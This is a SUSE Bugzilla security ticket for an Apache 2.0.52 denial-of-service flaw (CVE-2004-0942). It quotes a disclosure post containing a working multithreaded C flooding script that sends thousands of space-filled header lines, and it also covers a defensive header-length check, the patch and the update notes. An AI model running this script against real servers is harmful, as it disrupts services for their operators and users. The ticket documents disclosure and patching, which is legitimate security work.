Bugzilla – Bug 62967
VUL-0: CVE-2004-0942: Apache2 DoS
Last modified: 2021-10-16 09:11:09 UTC
We received the following report via full-disclosure. The issue is public. Not a very efficient DoS, one needs to send huge amounts of data: http://www.apacheweek.com/features/security-20 CAN-2004-0942

Date: Mon, 1 Nov 2004 15:27:42 +0530
From: Chintan Trivedi <chesschintan@gmail.com>
To: full-disclosure@lists.netsys.com
Subject: [Full-Disclosure] DoS in Apache 2.0.52 ?

Hi,

I was doing some testing on Apache webserver ver 2.0.52 (unix) and previous versions. Just found that a special type of request consumes a lot of CPU usage and hangs the webserver. It even hangs other services like ssh, ftp ..

For Apache 2.0.52 a request like

GET / HTTP/1.0\n
[space] x 8000\n
[space] x 8000\n
[space] x 8000\n
. . 8000 times

consumes a lot of cpu. I created 25 threads (connections) and sent the above request to one webserver. After just 2-3 minutes of flooding, the server wasn't able to fulfill any http requests. Even ssh and such other services were also hung up. The time required for the attack was just maximum 5 minutes.

I am not sure whether it is a valid DoS or not. Replacing the <space> with any other char will break the connection just after a few lines (130 or so) of header. Checking the httpd-2.0.52/server/protocol.c file I see the code for the mime headers. It checks for the first char of the header. If it is a "space" it considers it as an extension to the previous line header.

The problem seems to be similar to the advisory published by Guninski a few weeks ago -> http://www.guninski.com/httpd1.html though it's a bit different. That fix was for the long request field header when the header line is extended in the next line using space. Well I guess an 8K limit for the number of headers filled with spaces is quite huge. It's enough to DoS the server using a few threads.

You can check the attached C file to test it. The file is compiled on a windows system using VC++ 6.0.
-----------------POC----------------------------

```c
/// Apache 2.0.52 and earlier DoS
#include "stdafx.h"
#include "winsock.h"
#include "string.h"
#include "stdio.h"
#include "windows.h"
#pragma comment(lib,"ws2_32")

#define NTHREADS 50

DWORD WINAPI attack(LPVOID);
char target[256];

int main(int argc, char* argv[])
{
    int l = 0;
    int j;
    DWORD dw;
    HANDLE hd[NTHREADS];   /* one handle per thread, so every thread is waited on */

    if (argc < 2) {
        printf("usage: %s target", argv[0]);
        exit(0);
    }
    strncpy(target, argv[1], sizeof(target) - 1);
    target[sizeof(target) - 1] = '\0';
    printf("Attaching %s ...\n", target);

    for (j = 0; j < NTHREADS; j++)
        hd[j] = CreateThread(NULL, 0, attack, (LPVOID)l, 0, &dw);
    for (j = 0; j < NTHREADS; j++)
        WaitForSingleObject(hd[j], INFINITE);
    printf("done");
    return 0;
}

DWORD WINAPI attack(LPVOID l)
{
    int s;
    SOCKADDR_IN sck;
    HOSTENT *host;
    char buff[256];
    char space[8000];
    int i, len;
    WSADATA wsadata;

    WSAStartup(MAKEWORD(1,1), &wsadata);

    /* one header line consisting of 7998 spaces plus a newline */
    memset(space, ' ', 8000);
    space[7998] = '\n';
    space[7999] = '\0';

    if ((host = gethostbyname(target)) == NULL) {
        printf("Host not found");
        return -1;
    }
    sck.sin_family = PF_INET;
    memcpy(&sck.sin_addr.s_addr, host->h_addr, host->h_length);
    sck.sin_port = htons(80);

    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        printf("Socket couldn't be initialized");
        return -1;
    }
    if ((connect(s, (struct sockaddr *)&sck, sizeof(sck)))) {
        printf("Couldn't connect");
        return -1;
    }

    sprintf(buff, "GET / HTTP/1.0\n");
    //printf("%s",buff);
    len = strlen(buff);
    if ((send(s, buff, len, 0)) == -1) {
        printf("send error");
        closesocket(s);
        return -1;
    }
    /* follow the request line with a long run of space-prefixed header lines */
    for (i = 0; i < 9999; i++) {
        if ((send(s, space, strlen(space), 0)) == -1) {
            printf("Send Error on header number %d", i);
            closesocket(s);
            return -1;
        }
    }
    closesocket(s);
    return 0;
}
```

------------------------------------------------
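The report above turns on how protocol.c treats a header line that begins with whitespace: it is folded onto the previous field, so a field can grow across many lines while each individual line stays under the limit. The check below is an added example, not httpd's code and not from the report, of enforcing the request-field length limit on the folded field as a whole; the function names, the constructed request and the 8190 default (httpd's LimitRequestFieldSize) are this example's own assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum { HDR_OK = 0, HDR_TOO_LONG = 1 };   /* result codes (constructed example) */

/* Walk a header block up to the blank line. A line beginning with SP or HT
 * continues the previous field, so its bytes count toward that field's total.
 * Returns HDR_TOO_LONG as soon as one folded field exceeds `limit`
 * (LimitRequestFieldSize, httpd default 8190), however many lines carried it;
 * otherwise HDR_OK, with the logical field count in *nfields if non-NULL. */
int check_folded_headers(const char *p, size_t limit, int *nfields)
{
    size_t field_len = 0;
    int fields = 0;
    while (*p && *p != '\n' && !(p[0] == '\r' && p[1] == '\n')) {
        const char *eol = strchr(p, '\n');
        size_t line_len = eol ? (size_t)(eol - p) : strlen(p);
        if (line_len && p[line_len - 1] == '\r') line_len--;   /* drop CR */
        if (p[0] == ' ' || p[0] == '\t') {
            field_len += line_len;            /* folded onto previous field */
        } else {
            field_len = line_len;             /* start of a new field */
            fields++;
        }
        if (field_len > limit) return HDR_TOO_LONG;
        if (!eol) break;
        p = eol + 1;
    }
    if (nfields) *nfields = fields;
    return HDR_OK;
}

/* Constructed request: one header line, then `cont` continuation lines of
 * `width` spaces each, run through the check above. */
int demo_folded_request(size_t width, int cont, size_t limit)
{
    char *buf = malloc(16 + (size_t)cont * (width + 2)), *w = buf;
    int rc, i;
    if (!buf) return -1;
    w += sprintf(w, "X-Test: a\r\n");
    for (i = 0; i < cont; i++) {
        memset(w, ' ', width); w += width;
        *w++ = '\r'; *w++ = '\n';
    }
    strcpy(w, "\r\n");                        /* end of headers */
    rc = check_folded_headers(buf, limit, NULL);
    free(buf);
    return rc;
}
```

A per-line check alone would accept a request built from 130-byte continuation lines indefinitely; counting the folded total rejects it once the field passes the limit.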
Fixed in 2.0.53-dev, patch available in 2.0 CVS: http://cvs.apache.org/viewcvs.cgi/httpd-2.0/server/protocol.c?r1=1.158&r2=1.159
Packages submitted to autobuild:

/work/SRC/old-versions/8.1/all/apache2 -> /work/src/done/8.1
/work/SRC/old-versions/8.2/all/apache2 -> /work/src/done/8.2
/work/SRC/old-versions/9.0/all/apache2 -> /work/src/done/9.0
/work/SRC/old-versions/9.1/BETA/all/apache2 -> /work/src/done/SLES9-SP1
/work/SRC/old-versions/9.1/SLES/all/apache2 -> /work/src/done/9.1
/work/SRC/old-versions/9.2/all/apache2 -> /work/src/done/9.2

plus STABLE.

-------------------------------------------------------------------
Mon Nov 8 19:18:52 CET 2004 - poeml@suse.de

- security fix [CAN-2004-0942 (cve.mitre.org)]: Fix for memory consumption DoS [#47967]
- security fix [CAN-2004-0885 (cve.mitre.org)]: fix SSLCipherSuite bypass in mod_ssl [#47117]
-------------------------------------------------------------------
Patchinfos?
I'll attach and submit them shortly.
thanks. /me cancels context switch ;)
Created attachment 25920
patchinfo files for 8.1, 8.2, 9.0, 9.1, 9.2 and SLES9

poeml@aust ~/tmp % tar tvzf patchinfos-apache2.tar.gz
drwxr-xr-x poeml/suse    0 2004-11-09 16:18:48 patchinfos-apache2/
-rw-r--r-- poeml/suse 1071 2004-11-09 16:17:27 patchinfos-apache2/patchinfo.apache2.box.81
-rw-r--r-- poeml/suse 1070 2004-11-09 16:17:32 patchinfos-apache2/patchinfo.apache2.box.82
-rw-r--r-- poeml/suse 1098 2004-11-09 16:17:45 patchinfos-apache2/patchinfo.apache2.box.90
-rw-r--r-- poeml/suse 1066 2004-11-09 16:17:51 patchinfos-apache2/patchinfo.apache2.box.91
-rw-r--r-- poeml/suse 1066 2004-11-09 16:18:21 patchinfos-apache2/patchinfo.apache2.box.92
-rw-r--r-- poeml/suse  839 2004-11-09 16:18:48 patchinfos-apache2/patchinfo.apache2.sles

DESCRIPTION:
An issue allowing a remote Denial of Service attack has been fixed (the request field length limit was not enforced for certain malicious requests). A vulnerability in the mod_ssl module has been fixed (bypass of the "SSLCipherSuite" directive, when configured in directory or location context). CAN-2004-0942 and CAN-2004-0885 have been assigned to these issues.

DESCRIPTION_DE (German text, translated):
For certain requests, the limits on overly long header lines were not applied, which could lead to corresponding memory consumption on the server and thus allowed remote attackers to mount a Denial of Service attack. In addition, a vulnerability in the mod_ssl module has been fixed (bypass of the "SSLCipherSuite" directive when it is used in a Directory or Location context). The identifiers CAN-2004-0942 and CAN-2004-0885 have been assigned to these vulnerabilities.
I assign to security-team for further processing
approved
CVE-2004-0942: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)